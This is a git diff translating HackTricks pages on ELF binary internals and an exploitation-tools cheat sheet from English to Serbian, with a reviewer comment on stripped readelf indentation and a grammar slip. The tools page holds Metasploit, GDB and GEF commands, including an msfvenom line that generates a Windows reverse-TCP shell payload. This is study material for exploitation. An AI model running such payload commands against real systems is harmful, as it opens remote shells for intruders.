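Review bot: the `@@ -14,80 +13,78 @@` hunk strips the leading whitespace from every line of the quoted `readelf -lW` output inside the fence: `-  PHDR 0x000040 ...` becomes `+PHDR 0x000040 ...`, `-  [Requesting program interpreter: ...]` becomes `+[Requesting program interpreter: ...]`, and the same for the `Section to Segment mapping` rows. That text is captured tool output, not prose to translate, so it should be carried over byte for byte; as changed, the `Type` column no longer lines up with its header and the segment map loses the indentation that shows `00`..`08` belong under `Segment Sections...`. Two smaller points in the same hunk: `+Sadrži tabele zaglavlja programa i samu metapodatke.` has a gender mismatch (`metapodaci` is masculine plural, so `i same metapodatke`), and the blank lines around `+## Zaglavlja sekcija` that the old `-## Section Headers` block had were removed, leaving the heading glued to its paragraph and to the following ```` ``` ```` fence.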
@@ -95,159 +92,153 @@ lnstat: file format elf64-littleaarch64 Sections: Idx Name Size VMA LMA File off Algn - 0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2 - CONTENTS, ALLOC, LOAD, READONLY, CODE - 15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2 - CONTENTS, ALLOC, LOAD, 
READONLY, DATA - 17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3 - CONTENTS, ALLOC, LOAD, READONLY, DATA - 18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3 - CONTENTS, ALLOC, LOAD, DATA - 19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3 - CONTENTS, ALLOC, LOAD, DATA - 20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3 - CONTENTS, ALLOC, LOAD, DATA - 21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3 - CONTENTS, ALLOC, LOAD, DATA - 22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3 - CONTENTS, ALLOC, LOAD, DATA - 23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3 - ALLOC - 24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0 - CONTENTS, READONLY - 25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2 - CONTENTS, READONLY +0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0 +CONTENTS, ALLOC, LOAD, READONLY, DATA +1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0 +CONTENTS, ALLOC, LOAD, READONLY, DATA +7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1 +CONTENTS, ALLOC, LOAD, READONLY, DATA +8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3 +CONTENTS, ALLOC, LOAD, 
READONLY, DATA +10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2 +CONTENTS, ALLOC, LOAD, READONLY, CODE +12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4 +CONTENTS, ALLOC, LOAD, READONLY, CODE +13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6 +CONTENTS, ALLOC, LOAD, READONLY, CODE +14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2 +CONTENTS, ALLOC, LOAD, READONLY, CODE +15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2 +CONTENTS, ALLOC, LOAD, READONLY, DATA +17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3 +CONTENTS, ALLOC, LOAD, READONLY, DATA +18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3 +CONTENTS, ALLOC, LOAD, DATA +19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3 +CONTENTS, ALLOC, LOAD, DATA +20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3 +CONTENTS, ALLOC, LOAD, DATA +21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3 +CONTENTS, ALLOC, LOAD, DATA +22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3 +CONTENTS, ALLOC, LOAD, DATA +23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3 +ALLOC +24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0 +CONTENTS, READONLY +25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2 +CONTENTS, READONLY ``` +To takođe ukazuje na lokaciju, ofset, dozvole, ali i na **tip podataka** koji sekcija ima. -It also indicates the location, offset, permissions but also the **type of data** it section has. +### Meta Sekcije -### Meta Sections +- **String tabela**: Sadrži sve stringove potrebne ELF datoteci (ali ne i one koje program zapravo koristi). 
Na primer, sadrži imena sekcija kao što su `.text` ili `.data`. I ako je `.text` na ofsetu 45 u string tabeli, koristiće broj **45** u polju **ime**. +- Da bi se pronašlo gde se nalazi string tabela, ELF sadrži pokazivač na string tabelu. +- **Symbol tabela**: Sadrži informacije o simbolima kao što su ime (ofset u string tabeli), adresa, veličina i više metapodataka o simbolu. -- **String table**: It contains all the strings needed by the ELF file (but not the ones actually used by the program). For example it contains sections names like `.text` or `.data`. And if `.text` is at offset 45 in the strings table it will use the number **45** in the **name** field. - - In order to find where the string table is, the ELF contains a pointer to the string table. -- **Symbol table**: It contains info about the symbols like the name (offset in the strings table), address, size and more metadata about the symbol. +### Glavne Sekcije -### Main Sections +- **`.text`**: Instrukcija programa koja se izvršava. +- **`.data`**: Globalne promenljive sa definisanom vrednošću u programu. +- **`.bss`**: Globalne promenljive koje nisu inicijalizovane (ili su inicijalizovane na nulu). Promenljive ovde se automatski inicijalizuju na nulu, čime se sprečava dodavanje bespotrebnih nula u binarni fajl. +- **`.rodata`**: Konstantne globalne promenljive (sekcija samo za čitanje). +- **`.tdata`** i **`.tbss`**: Kao .data i .bss kada se koriste promenljive lokalne za nit (`__thread_local` u C++ ili `__thread` u C). +- **`.dynamic`**: Vidi ispod. -- **`.text`**: The instruction of the program to run. -- **`.data`**: Global variables with a defined value in the program. -- **`.bss`**: Global variables left uninitialized (or init to zero). Variables here are automatically intialized to zero therefore preventing useless zeroes to being added to the binary. -- **`.rodata`**: Constant global variables (read-only section). 
-- **`.tdata`** and **`.tbss`**: Like the .data and .bss when thread-local variables are used (`__thread_local` in C++ or `__thread` in C). -- **`.dynamic`**: See below. - -## Symbols - -Symbols is a named location in the program which could be a function, a global data object, thread-local variables... +## Simboli +Simboli su imenovane lokacije u programu koje mogu biti funkcija, globalni objekat podataka, promenljive lokalne za nit... ``` readelf -s lnstat Symbol table '.dynsym' contains 49 entries: - Num: Value Size Type Bind Vis Ndx Name - 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND - 1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init - 2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data - 3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2) - 4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2) - 5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2) - 6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2) - 7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2) - 8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3) - 9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2) - 10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...] - 11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2) - 12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2) - [...] 
+Num: Value Size Type Bind Vis Ndx Name +0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND +1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init +2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data +3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2) +4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2) +5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2) +6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2) +7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2) +8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3) +9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2) +10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...] +11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2) +12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2) +[...] ``` +Svaki unos simbola sadrži: -Each symbol entry contains: - -- **Name** -- **Binding attributes** (weak, local or global): A local symbol can only be accessed by the program itself while the global symbol are shared outside the program. A weak object is for example a function that can be overridden by a different one. -- **Type**: NOTYPE (no type specified), OBJECT (global data var), FUNC (function), SECTION (section), FILE (source-code file for debuggers), TLS (thread-local variable), GNU_IFUNC (indirect function for relocation) -- **Section** index where it's located -- **Value** (address sin memory) -- **Size** - -## Dynamic Section +- **Ime** +- **Atributi vezivanja** (slab, lokalni ili globalni): Lokalni simbol može biti pristupljen samo od strane samog programa, dok su globalni simboli deljeni van programa. Slabi objekat je, na primer, funkcija koja može biti zamenjena drugom. 
+- **Tip**: NOTYPE (tip nije specificiran), OBJECT (globalna podatkovna varijabla), FUNC (funkcija), SECTION (sekcija), FILE (izvorni kod za debagere), TLS (varijabla lokalna za nit), GNU_IFUNC (indirektna funkcija za relokaciju) +- **Sekcija** indeks gde se nalazi +- **Vrednost** (adresa u memoriji) +- **Veličina** +## Dinamička sekcija ``` readelf -d lnstat Dynamic section at offset 0xfc58 contains 28 entries: - Tag Type Name/Value - 0x0000000000000001 (NEEDED) Shared library: [libc.so.6] - 0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1] - 0x000000000000000c (INIT) 0x1088 - 0x000000000000000d (FINI) 0x2f74 - 0x0000000000000019 (INIT_ARRAY) 0x1fc48 - 0x000000000000001b (INIT_ARRAYSZ) 8 (bytes) - 0x000000000000001a (FINI_ARRAY) 0x1fc50 - 0x000000000000001c (FINI_ARRAYSZ) 8 (bytes) - 0x000000006ffffef5 (GNU_HASH) 0x338 - 0x0000000000000005 (STRTAB) 0x7f0 - 0x0000000000000006 (SYMTAB) 0x358 - 0x000000000000000a (STRSZ) 510 (bytes) - 0x000000000000000b (SYMENT) 24 (bytes) - 0x0000000000000015 (DEBUG) 0x0 - 0x0000000000000003 (PLTGOT) 0x1fe58 - 0x0000000000000002 (PLTRELSZ) 960 (bytes) - 0x0000000000000014 (PLTREL) RELA - 0x0000000000000017 (JMPREL) 0xcc8 - 0x0000000000000007 (RELA) 0xaa0 - 0x0000000000000008 (RELASZ) 552 (bytes) - 0x0000000000000009 (RELAENT) 24 (bytes) - 0x000000000000001e (FLAGS) BIND_NOW - 0x000000006ffffffb (FLAGS_1) Flags: NOW PIE - 0x000000006ffffffe (VERNEED) 0xa50 - 0x000000006fffffff (VERNEEDNUM) 2 - 0x000000006ffffff0 (VERSYM) 0x9ee - 0x000000006ffffff9 (RELACOUNT) 15 - 0x0000000000000000 (NULL) 0x0 +Tag Type Name/Value +0x0000000000000001 (NEEDED) Shared library: [libc.so.6] +0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1] +0x000000000000000c (INIT) 0x1088 +0x000000000000000d (FINI) 0x2f74 +0x0000000000000019 (INIT_ARRAY) 0x1fc48 +0x000000000000001b (INIT_ARRAYSZ) 8 (bytes) +0x000000000000001a (FINI_ARRAY) 0x1fc50 +0x000000000000001c (FINI_ARRAYSZ) 8 (bytes) +0x000000006ffffef5 (GNU_HASH) 0x338 
+0x0000000000000005 (STRTAB) 0x7f0 +0x0000000000000006 (SYMTAB) 0x358 +0x000000000000000a (STRSZ) 510 (bytes) +0x000000000000000b (SYMENT) 24 (bytes) +0x0000000000000015 (DEBUG) 0x0 +0x0000000000000003 (PLTGOT) 0x1fe58 +0x0000000000000002 (PLTRELSZ) 960 (bytes) +0x0000000000000014 (PLTREL) RELA +0x0000000000000017 (JMPREL) 0xcc8 +0x0000000000000007 (RELA) 0xaa0 +0x0000000000000008 (RELASZ) 552 (bytes) +0x0000000000000009 (RELAENT) 24 (bytes) +0x000000000000001e (FLAGS) BIND_NOW +0x000000006ffffffb (FLAGS_1) Flags: NOW PIE +0x000000006ffffffe (VERNEED) 0xa50 +0x000000006fffffff (VERNEEDNUM) 2 +0x000000006ffffff0 (VERSYM) 0x9ee +0x000000006ffffff9 (RELACOUNT) 15 +0x0000000000000000 (NULL) 0x0 ``` +Direktorijum NEEDED ukazuje da program **treba da učita pomenutu biblioteku** kako bi nastavio. Direktorijum NEEDED se završava kada je deljena **biblioteka potpuno operativna i spremna** za korišćenje. -The NEEDED directory indicates that the program **needs to load the mentioned library** in order to continue. The NEEDED directory completes once the shared **library is fully operational and ready** for use. - -## Relocations - -The loader also must relocate dependencies after having loaded them. These relocations are indicated in the relocation table in formats REL or RELA and the number of relocations is given in the dynamic sections RELSZ or RELASZ. +## Relokacije +Loader takođe mora da relokira zavisnosti nakon što ih učita. Ove relokacije su označene u tabeli relokacija u formatima REL ili RELA, a broj relokacija je dat u dinamičkim sekcijama RELSZ ili RELASZ. ``` readelf -r lnstat Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries: - Offset Info Type Sym. Value Sym. Name + Addend +Offset Info Type Sym. Value Sym. Name + Addend 00000001fc48 000000000403 R_AARCH64_RELATIV 1d10 00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0 00000001fff0 000000000403 R_AARCH64_RELATIV 1340 
@@ -273,7 +264,7 @@ Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries: 00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0 Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries: - Offset Info Type Sym. Value Sym. Name + Addend +Offset Info Type Sym. Value Sym. Name + Addend 00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0 00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0 00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0 
@@ -315,82 +306,77 @@ Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries: 00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0 00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0 ``` +### Staticke Relokacije -### Static Relocations +Ako je **program učitan na mestu koje se razlikuje** od preferirane adrese (obično 0x400000) zato što je adresa već zauzeta ili zbog **ASLR** ili bilo kog drugog razloga, statička relokacija **ispravlja pokazivače** koji su imali vrednosti očekujući da će binarni fajl biti učitan na preferiranoj adresi. -If the **program is loaded in a place different** from the preferred address (usually 0x400000) because the address is already used or because of **ASLR** or any other reason, a static relocation **corrects pointers** that had values expecting the binary to be loaded in the preferred address. +Na primer, svaka sekcija tipa `R_AARCH64_RELATIV` treba da ima modifikovanu adresu na relokacionom pristrasnosti plus vrednost adenda. -For example any section of type `R_AARCH64_RELATIV` should have modified the address at the relocation bias plus the addend value. +### Dinamičke Relokacije i GOT -### Dynamic Relocations and GOT +Relokacija može takođe referencirati spoljašnji simbol (kao što je funkcija iz zavisnosti). Kao što je funkcija malloc iz libC. Tada, učitavač prilikom učitavanja libC na adresu proverava gde je učitana funkcija malloc, i upisuje ovu adresu u GOT (Global Offset Table) tabelu (naznačenu u relokacionoj tabeli) gde bi adresa malloc trebala biti specificirana. -The relocation could also reference an external symbol (like a function from a dependency). Like the function malloc from libC. Then, the loader when loading libC in an address checking where the malloc function is loaded, it will write this address in the GOT (Global Offset Table) table (indicated in the relocation table) where the address of malloc should be specified. 
+### Tabela Povezivanja Procedura -### Procedure Linkage Table +PLT sekcija omogućava obavljanje lenjog povezivanja, što znači da će se rešavanje lokacije funkcije obaviti prvi put kada se pristupi. -The PLT section allows to perform lazy binding, which means that the resolution of the location of a function will be performed the first time it's accessed. +Dakle, kada program poziva malloc, zapravo poziva odgovarajuću lokaciju `malloc` u PLT (`malloc@plt`). Prvi put kada se pozove, rešava adresu `malloc` i čuva je tako da se sledeći put kada se pozove `malloc`, ta adresa koristi umesto PLT koda. -So when a program calls to malloc, it actually calls the corresponding location of `malloc` in the PLT (`malloc@plt`). The first time it's called it resolves the address of `malloc` and stores it so next time `malloc` is called, that address is used instead of the PLT code. - -## Program Initialization - -After the program has been loaded it's time for it to run. However, the first code that is run i**sn't always the `main`** function. This is because for example in C++ if a **global variable is an object of a class**, this object must be **initialized** **before** main runs, like in: +## Inicijalizacija Programa +Nakon što je program učitan, vreme je da se pokrene. Međutim, prvi kod koji se izvršava **nije uvek `main`** funkcija. 
To je zato što, na primer, u C++ ako je **globalna promenljiva objekat klase**, ovaj objekat mora biti **inicijalizovan** **pre** nego što main bude pokrenut, kao u: ```cpp #include // g++ autoinit.cpp -o autoinit class AutoInit { - public: - AutoInit() { - printf("Hello AutoInit!\n"); - } - ~AutoInit() { - printf("Goodbye AutoInit!\n"); - } +public: +AutoInit() { +printf("Hello AutoInit!\n"); +} +~AutoInit() { +printf("Goodbye AutoInit!\n"); +} }; AutoInit autoInit; int main() { - printf("Main\n"); - return 0; +printf("Main\n"); +return 0; } ``` +Napomena da su ove globalne promenljive smeštene u `.data` ili `.bss`, ali u listama `__CTOR_LIST__` i `__DTOR_LIST__` objekti za inicijalizaciju i destrukciju su smešteni kako bi se pratili. -Note that these global variables are located in `.data` or `.bss` but in the lists `__CTOR_LIST__` and `__DTOR_LIST__` the objects to initialize and destruct are stored in order to keep track of them. - -From C code it's possible to obtain the same result using the GNU extensions : - +Iz C koda je moguće dobiti isti rezultat koristeći GNU ekstenzije: ```c __attributte__((constructor)) //Add a constructor to execute before __attributte__((destructor)) //Add to the destructor list ``` +Sa perspektive kompajlera, da bi se izvršile ove radnje pre i posle izvršavanja `main` funkcije, moguće je kreirati `init` funkciju i `fini` funkciju koje bi bile referencirane u dinamičkom odeljku kao **`INIT`** i **`FIN`**. i smeštene su u `init` i `fini` odeljke ELF-a. -From a compiler perspective, to execute these actions before and after the `main` function is executed, it's possible to create a `init` function and a `fini` function which would be referenced in the dynamic section as **`INIT`** and **`FIN`**. and are placed in the `init` and `fini` sections of the ELF. 
+Druga opcija, kao što je pomenuto, je da se referenciraju liste **`__CTOR_LIST__`** i **`__DTOR_LIST__`** u **`INIT_ARRAY`** i **`FINI_ARRAY`** stavkama u dinamičkom odeljku, a dužina ovih stavki je označena sa **`INIT_ARRAYSZ`** i **`FINI_ARRAYSZ`**. Svaka stavka je pokazivač na funkciju koja će biti pozvana bez argumenata. -The other option, as mentioned, is to reference the lists **`__CTOR_LIST__`** and **`__DTOR_LIST__`** in the **`INIT_ARRAY`** and **`FINI_ARRAY`** entries in the dynamic section and the length of these are indicated by **`INIT_ARRAYSZ`** and **`FINI_ARRAYSZ`**. Each entry is a function pointer that will be called without arguments. +Štaviše, moguće je imati i **`PREINIT_ARRAY`** sa **pokazivačima** koji će biti izvršeni **pre** **`INIT_ARRAY`** pokazivača. -Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** that will be executed **before** the **`INIT_ARRAY`** pointers. +### Redosled inicijalizacije -### Initialization Order - -1. The program is loaded into memory, static global variables are initialized in **`.data`** and unitialized ones zeroed in **`.bss`**. -2. All **dependencies** for the program or libraries are **initialized** and the the **dynamic linking** is executed. -3. **`PREINIT_ARRAY`** functions are executed. -4. **`INIT_ARRAY`** functions are executed. -5. If there is a **`INIT`** entry it's called. -6. If a library, dlopen ends here, if a program, it's time to call the **real entry point** (`main` function). +1. Program se učitava u memoriju, statičke globalne promenljive se inicijalizuju u **`.data`** i neinicijalizovane se postavljaju na nulu u **`.bss`**. +2. Sve **zavisnosti** za program ili biblioteke se **inicijalizuju** i izvršava se **dinamičko povezivanje**. +3. **`PREINIT_ARRAY`** funkcije se izvršavaju. +4. **`INIT_ARRAY`** funkcije se izvršavaju. +5. Ako postoji **`INIT`** stavka, ona se poziva. +6. 
Ako je u pitanju biblioteka, dlopen ovde završava, ako je program, vreme je da se pozove **pravi ulazni tačka** (`main` funkcija). ## Thread-Local Storage (TLS) -They are defined using the keyword **`__thread_local`** in C++ or the GNU extension **`__thread`**. +Definišu se korišćenjem ključne reči **`__thread_local`** u C++ ili GNU ekstenzije **`__thread`**. -Each thread will maintain a unique location for this variable so only the thread can access its variable. +Svaki nit će održavati jedinstvenu lokaciju za ovu promenljivu tako da samo nit može pristupiti svojoj promenljivoj. -When this is used the sections **`.tdata`** and **`.tbss`** are used in the ELF. Which are like `.data` (initialized) and `.bss` (not initialized) but for TLS. +Kada se ovo koristi, odeljci **`.tdata`** i **`.tbss`** se koriste u ELF-u. Koji su slični `.data` (inicijalizovano) i `.bss` (neinicijalizovano) ali za TLS. -Each variable will hace an entry in the TLS header specifying the size and the TLS offset, which is the offset it will use in the thread's local data area. +Svaka promenljiva će imati stavku u TLS headeru koja specificira veličinu i TLS offset, što je offset koji će koristiti u lokalnom području podataka niti. -The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module. +`__TLS_MODULE_BASE` je simbol koji se koristi za referenciranje osnovne adrese skladišta lokalnih niti i ukazuje na područje u memoriji koje sadrži sve podatke lokalne za niti modula. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md index 70aa57cc5..5bad25144 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md 
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md @@ -1,9 +1,8 @@ -# Exploiting Tools +# Alati za iskorišćavanje {{#include ../../../banners/hacktricks-training.md}} ## Metasploit - ```bash pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset @@ -11,31 +10,23 @@ nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` - ### Shellcodes - ```bash msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` - ## GDB -### Install - +### Instaliraj ```bash apt-get install gdb ``` - -### Parameters - +### Parametri ```bash -q # No show banner -x # Auto-execute GDB instructions from here -p # Attach to process ``` - -### Instructions - +### Uputstva ```bash run # Execute start # Start and break in main @@ -81,11 +72,9 @@ x/s pointer # String pointed by the pointer x/xw &pointer # Address where the pointer is located x/i $eip # Instructions of the EIP ``` - ### [GEF](https://github.com/hugsy/gef) -You could optionally use [**this fork of GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) which contains more interesting instructions. - +Možete opcionalno koristiti [**ovu fork verziju GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) koja sadrži zanimljivije upute. ```bash help memory # Get help on memory command canary # Search for canary value in memory 
@@ -118,34 +107,32 @@ dump binary memory /tmp/dump.bin 0x200000000 0x20000c350 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: - rip = 0x400cd3; saved rip = 0x6261617762616176 - called by frame at 0x7fffffffddd8 - Arglist at 0x7fffffffdcf8, args: - Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 - Saved registers: - rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 +rip = 0x400cd3; saved rip = 0x6261617762616176 +called by frame at 0x7fffffffddd8 +Arglist at 0x7fffffffdcf8, args: +Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 +Saved registers: +rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` +### Trikovi -### Tricks +#### GDB iste adrese -#### GDB same addresses - -While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: +Dok debagujete, GDB će imati **malo drugačije adrese od onih koje koristi binarni fajl kada se izvršava.** Možete učiniti da GDB ima iste adrese tako što ćete: - `unset env LINES` - `unset env COLUMNS` -- `set env _=` _Put the absolute path to the binary_ -- Exploit the binary using the same absolute route -- `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +- `set env _=` _Unesite apsolutnu putanju do binarnog fajla_ +- Iskoristite binarni fajl koristeći istu apsolutnu putanju +- `PWD` i `OLDPWD` moraju biti isti kada koristite GDB i kada eksploatišete binarni fajl -#### Backtrace to find functions called - -When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). 
In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ -You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: +#### Backtrace za pronalaženje pozvanih funkcija +Kada imate **staticki povezani binarni fajl**, sve funkcije će pripadati binarnom fajlu (a ne spoljnim bibliotekama). U ovom slučaju će biti teško **identifikovati tok koji binarni fajl prati da bi, na primer, zatražio unos od korisnika.**\ +Možete lako identifikovati ovaj tok tako što ćete **pokrenuti** binarni fajl sa **gdb** dok ne budete zatraženi za unos. Zatim, zaustavite ga sa **CTRL+C** i koristite **`bt`** (**backtrace**) komandu da vidite pozvane funkcije: ``` gef➤ bt #0 0x00000000004498ae in ?? () 
